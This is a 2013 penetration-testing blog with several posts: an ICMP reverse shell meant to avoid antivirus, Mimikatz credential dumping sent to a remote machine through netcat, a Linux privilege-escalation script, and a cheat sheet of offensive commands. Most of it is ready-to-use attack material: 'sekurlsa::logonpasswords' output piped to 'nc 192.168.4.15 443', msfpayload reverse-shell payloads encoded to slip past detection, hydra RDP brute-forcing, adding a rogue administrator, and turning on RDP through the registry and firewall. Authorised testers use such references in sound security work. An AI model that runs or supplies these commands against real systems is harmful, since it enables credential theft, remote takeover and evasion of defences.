Saturday 21 December 2013

ICMP Reverse Shell


Every time while penetration testing, we come across scenarios where we need to get shell on remote box, and most handy tool is Metasploit Meterpreter which most of our Smart Antiviruses detects and quickly we need some way to get around.

We can try ICMP Reverse shell, which I recently tested on my machine.
Most important thing, It don't require Administrator access to machine we can just use it on the fly.

I know there are lot of articles on ICMP shell over internet, but this is just for quick reference.

Download ICMP Shell from : https://github.com/inquisb/icmpsh

1. Upload "icmpsh.exe" on victim machine, trust me Antivirus didn't detect in my case.
2. Execute "icmpsh.exe -t <Attackers IP> -d 500 -b 30 -s 128"
3. Start listener on Attacker machine with "python icmpsh_m.py <attacker's IP> <Victims IP> "
4. Or you can use listener scripts "./run.sh" which will generate Step 2 command for you, and start listener 


Exported Shell through ICMP

















Windows Shell
























For more details you can visit :

Hope this is helpful!..

Sunday 15 December 2013

Mimikatz Logs and Netcat


Imagine a scenario where you have access to Active Directory, or Mail Server and you are able to run mimikatz on the server (This is Practical Scenario) , I am damn sure you will get hell lot of passwords out of it may be in 1000's , but problems you may face is output of mimikatz will so large that you can't copy it even after increasing your command prompt buffer, and decided to look for ways of saving Mimikatz output in some file, as there is very little info I could find, and decided to write little article on this.

Mimikatz Author Webpage Here

Log Mimikatz Output using "log command"

Using log Command


Generated Log File


Log Mimikatz output in file Manually:

Batch Command Method



























Export Mimikatz Shell to Remote Machine Through Netcat :

Exporting Mimikatz Shell

Mimikatz through Netcat



















Export Mimikatz Output to Remote Console

Exported Mimikatz Output

Mimikatz Output on remote console













Exported Mimikatz Output in file On remote machine























List of Commands Used:

  • mimikatz.exe ""privilege::debug"" ""sekurlsa::logonpasswords full"" exit
  • mimikatz.exe ""privilege::debug"" ""log sekurlsa::logonpasswords full"" exit
  • mimikatz.exe ""privilege::debug"" ""log d:\log.txt sekurlsa::logonpasswords full"" exit
  • mimikatz.exe ""privilege::debug"" ""sekurlsa::logonpasswords full"" exit >> d:\log.txt
  • nc.exe -vv IP 443 -e mimikatz.exe ""privilege::debug"" ""sekurlsa::logonpasswords full "" exit
  • mimikatz.exe ""privilege::debug"" ""sekurlsa::logonpasswords full"" exit | nc.exe -vv 192.168.4.15 443

Best Netcat Cheet Sheets from SANS Here

I Hope this article will be helpful to all of you!



Thursday 12 December 2013

Linux Privilege Escalation Enumeration Shell Script


I have created little shell script for Linux Privilege Escalation Enumeration, and have uploaded on github, I am going to add few more stuff in the script soon to make it a bit advanced, I am sure it will help all of us.

Download Scripts:
https://github.com/expl0i13r/privescalation/archive/master.zip
https://github.com/expl0i13r/privescalation/blob/master/privescalation.sh

Also You Can refer below script:

https://github.com/rebootuser/LinEnum

Hope this is helpful, let me know in case it needs modifications, I will be happy to work on it.

Penetration Testing Necessary Links and Handy Commands


I personally require quick access to few commands, and some links while working on Penetration Testing exercises, so decided to post below information on this blog :)

General Links 

Privilege Escalation Links:
Handy Commands:


Scans all ports with 10000 Pakctes rate:

unicornscan X.X.X.X:a -r10000 -v

Python:

python -c 'import pty;pty.spawn("/bin/bash")'
python -m SimpleHTTPServer   (Starting HTTP Server)

Hydra:

hydra  -l admin -P /root/Desktop/passwords -S X.X.X.X rdp   (Self Explanatory)

Mount Remote Windows Share:

smbmount //X.X.X.X/c$ /mnt/remote/ -o username=user,password=pass,rw

Metasploit Payloads:

msfpayload windows/meterpreter/reverse_tcp LHOST=10.10.10.10 X > system.exe
msfpayload php/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=443 R > exploit.php
msfpayload windows/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=443 R | msfencode -t asp -o file.asp
msfpayload windows/meterpreter/reverse_tcp LHOST=X.X.X.X LPORT=443 R |  msfencode -e x86/shikata_ga_nai -b "\x00" -t c

Plink Tunnel:

plink.exe -P 22 -l root -pw "1234" -R 445:127.0.0.1:445 X.X.X.X

Enable RDP Access:

reg add "hklm\system\currentcontrolset\control\terminal server" /f /v fDenyTSConnections /t REG_DWORD /d 0
netsh firewall set service remoteadmin enable 
netsh firewall set service remotedesktop enable


Nmap WebDAV Scanning:

nmap -p80,8080 --script=http-iis-webdav-vuln

Meterpreter:

run getgui -u admin -p 1234
run vnc -p 5043

Add User Windows:

net user test 1234 /add
net localgroup administrators test /add

Mimikatz:

privilege::debug
sekurlsa::logonPasswords full

Compiling Windows Exploits on Backtrack:

cd /root/.wine/drive_c/MinGW/bin
wine gcc -o ability.exe /tmp/exploit.c -lwsock32
wine ability.exe

Nasm Command:

nasm -f bin -o payload.bin payload.asm


To Be Continued....

Hope its helpful to all of you!